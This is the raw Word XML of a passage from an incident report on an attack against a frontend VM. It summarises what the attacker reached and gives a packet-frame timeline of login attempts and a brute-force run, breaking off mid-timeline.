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5C9A1E" w:rsidR="006060B0" w:rsidRDefault="780A9480" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Security Breach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F8FA90" w14:textId="316479FE" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13DA13AA" w14:textId="3F30AB72" w:rsidR="537FB007" w:rsidRDefault="537FB007" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5A9C2B" w14:textId="2B553F64" w:rsidR="537FB007" w:rsidRDefault="537FB007" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The frontend VM was victim of an attack</w:t>
      </w:r>
      <w:r w:rsidR="46A094B6" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="41954536" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">one file was changed on an attempt to gain remote control of the frontend VM, however, the attacker didn’t succeed </w:t>
      </w:r>
      <w:r w:rsidR="46FAA7B4" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in doing</w:t>
      </w:r>
      <w:r w:rsidR="41954536" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> so.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="3E5ADD77" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="383DE21C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>he attacker</w:t>
      </w:r>
      <w:r w:rsidR="26EFC982" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="475458D8" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> also</w:t>
      </w:r>
      <w:r w:rsidR="383DE21C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tried to change the main page</w:t>
      </w:r>
      <w:r w:rsidR="6F4DB779" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> html</w:t>
      </w:r>
      <w:r w:rsidR="383DE21C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5A086AB5" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">code </w:t>
      </w:r>
      <w:r w:rsidR="383DE21C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">but </w:t>
      </w:r>
      <w:r w:rsidR="60A15CD2" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>also failed.</w:t>
      </w:r>
      <w:r w:rsidR="4A26D659" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="11E8878C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>However, a m</w:t>
      </w:r>
      <w:r w:rsidR="07B7A6C5" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">essage was left on the website </w:t>
      </w:r>
      <w:r w:rsidR="385E75AA" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in the form of a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="385E75AA" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>png</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="385E75AA" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> image</w:t>
      </w:r>
      <w:r w:rsidR="5A99DF68" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that was uploaded to the VM</w:t>
      </w:r>
      <w:r w:rsidR="0EADA94E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C04B5B7" w14:textId="47E40969" w:rsidR="5CD66763" w:rsidRDefault="5CD66763" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The following image is the message uploaded by the</w:t>
      </w:r>
      <w:r w:rsidR="707ECFCE" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A03CE76" w14:textId="43C0035A" w:rsidR="24F3DA23" w:rsidRDefault="24F3DA23" w:rsidP="1DD92F8E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A6A259C" wp14:editId="32FDB7BD">
            <wp:extent cx="4526280" cy="3017520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1257543597" name="Imagem 125754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C4D0" w14:textId="37EECD29" w:rsidR="2396E4B0" w:rsidRDefault="2396E4B0" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Even though they </w:t>
      </w:r>
      <w:r w:rsidR="4C8CC05F" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>did</w:t>
      </w:r>
      <w:r w:rsidR="49D68AC2" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n’t</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> succeed </w:t>
      </w:r>
      <w:r w:rsidR="5C3875A1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in making</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dangerous </w:t>
      </w:r>
      <w:r w:rsidR="681E2E23" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>modifications, they</w:t>
      </w:r>
      <w:r w:rsidR="5DC50DDC" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> did get control over the machine and were able to </w:t>
      </w:r>
      <w:r w:rsidR="05B0F20C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">navigate and read </w:t>
      </w:r>
      <w:r w:rsidR="4D02B967" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">critical </w:t>
      </w:r>
      <w:r w:rsidR="05B0F20C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>information from the VM</w:t>
      </w:r>
      <w:r w:rsidR="08669071" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, including the server’s source code, </w:t>
      </w:r>
      <w:r w:rsidR="0ECD26D5" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">private keys, </w:t>
      </w:r>
      <w:r w:rsidR="0419CFB3" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>logs,</w:t>
      </w:r>
      <w:r w:rsidR="0ECD26D5" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="025E5049" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>list of system users</w:t>
      </w:r>
      <w:r w:rsidR="10AE61C9" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="4A4C83CA" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The consultation of the source code gave the </w:t>
      </w:r>
      <w:r w:rsidR="4230EBAF" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">website </w:t>
      </w:r>
      <w:r w:rsidR="4A4C83CA" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">admin credentials to the attackers (since they are </w:t>
      </w:r>
      <w:r w:rsidR="08F168FC" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">clearly </w:t>
      </w:r>
      <w:r w:rsidR="4A4C83CA" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exposed in the code)</w:t>
      </w:r>
      <w:r w:rsidR="14F92FD9" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050E2005" w14:textId="3414103D" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E"/>
    <w:p w14:paraId="23CFFA90" w14:textId="320FCBE8" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E"/>
    <w:p w14:paraId="56A9EB2E" w14:textId="33EAB9AF" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E"/>
    <w:p w14:paraId="6A7E33FF" w14:textId="6A3E4517" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E"/>
    <w:p w14:paraId="71175301" w14:textId="291506A4" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E"/>
    <w:p w14:paraId="091CC166" w14:textId="5B484EA6" w:rsidR="789ED5FE" w:rsidRDefault="789ED5FE" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Deep analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5C8058" w14:textId="5FE5C359" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A28ACED" w14:textId="01FD2DA4" w:rsidR="789ED5FE" w:rsidRDefault="789ED5FE" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Actions made by the attacking entity </w:t>
      </w:r>
      <w:r w:rsidR="1DBCC5AA" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">(IP = 192.168.1.122) </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ordered chronologically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EA0729" w14:textId="69D446C3" w:rsidR="58FC496E" w:rsidRDefault="58FC496E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>(Jan 6 – Date of the attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F02FDC9" w14:textId="00528CCA" w:rsidR="0E8B6B5B" w:rsidRDefault="0E8B6B5B" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs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 4</w:t>
      </w:r>
      <w:r w:rsidR="458C3E9F" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="2C05C161" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>19:14 WET</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F85D4D4" w14:textId="3046AA56" w:rsidR="5878174C" w:rsidRDefault="5878174C" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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The attacker communicate</w:t>
      </w:r>
      <w:r w:rsidR="24ACE2B4" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the server for the first </w:t>
      </w:r>
      <w:r w:rsidR="64F65E01" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AABB6FE" w14:textId="02142A39" w:rsidR="46FF0637" w:rsidRDefault="46FF0637" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs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</w:t>
      </w:r>
      <w:r w:rsidR="64722BDF" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 295</w:t>
      </w:r>
      <w:r w:rsidR="1FD042DC" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="64722BDF" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>19:14 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4276FB78" w14:textId="5513096A" w:rsidR="64722BDF" w:rsidRDefault="64722BDF" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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Tries to enter the upload page without </w:t>
      </w:r>
      <w:r w:rsidR="1B4BEC2F" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A35889" w14:textId="663282AC" w:rsidR="74CC7C5A" w:rsidRDefault="74CC7C5A" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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>Access denied</w:t>
      </w:r>
      <w:r w:rsidR="02B20839" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE4449" w14:textId="5D855315" w:rsidR="41DBDDD8" w:rsidRDefault="41DBDDD8" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"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 445</w:t>
      </w:r>
      <w:r w:rsidR="48103BF7" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>19:15 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52023FB3" w14:textId="28E777E0" w:rsidR="69E2FC6F" w:rsidRDefault="69E2FC6F" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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Tries</w:t>
      </w:r>
      <w:r w:rsidR="41DBDDD8" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to login on admin’s account using random password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EF27AA" w14:textId="423EEB53" w:rsidR="202EE7B8" w:rsidRDefault="202EE7B8" w:rsidP="1DD92F8E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>Access denied</w:t>
      </w:r>
      <w:r w:rsidR="3A3D6F23" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C00D5AD" w14:textId="57CB74BA" w:rsidR="202EE7B8" w:rsidRDefault="202EE7B8" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"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 610</w:t>
      </w:r>
      <w:r w:rsidR="7DCA8D6C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 19:15 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB07A02" w14:textId="5244F8B5" w:rsidR="7DCA8D6C" w:rsidRDefault="7DCA8D6C" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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Tries to access index.html from URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FD767B" w14:textId="1BADA2ED" w:rsidR="7DCA8D6C" w:rsidRDefault="7DCA8D6C" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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Not found, redirects to </w:t>
      </w:r>
      <w:r w:rsidR="22287B9B" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>404</w:t>
      </w:r>
      <w:r w:rsidR="66AFC50E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> page</w:t>
      </w:r>
      <w:r w:rsidR="29B1BAAC" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB7B132" w14:textId="17C12D9F" w:rsidR="60CD60CC" w:rsidRDefault="60CD60CC" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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“404” page has a serious problem that will be acknowledged </w:t>
      </w:r>
      <w:r w:rsidR="344CD1C7" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>later in</w:t>
      </w:r>
      <w:r w:rsidR="6632C34A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> this report</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0081DF46" w14:textId="05571BF3" w:rsidR="0DC1DD14" w:rsidRDefault="0DC1DD14" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Frames 621 to</w:t>
      </w:r>
      <w:r w:rsidR="3120A322" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6609 – 19:15 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651F6476" w14:textId="752F7B73" w:rsidR="1D027552" w:rsidRDefault="1D027552" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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Tries to login using </w:t>
      </w:r>
      <w:r w:rsidR="61C78BF6" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Brute-Force.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B627B6" w14:textId="028CA8D7" w:rsidR="61C78BF6" w:rsidRDefault="61C78BF6" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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About 3000 </w:t>
      </w:r>
      <w:r w:rsidR="4EED3524" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">login </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attempts</w:t>
      </w:r>
      <w:r w:rsidR="5A093AB4" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> were made</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
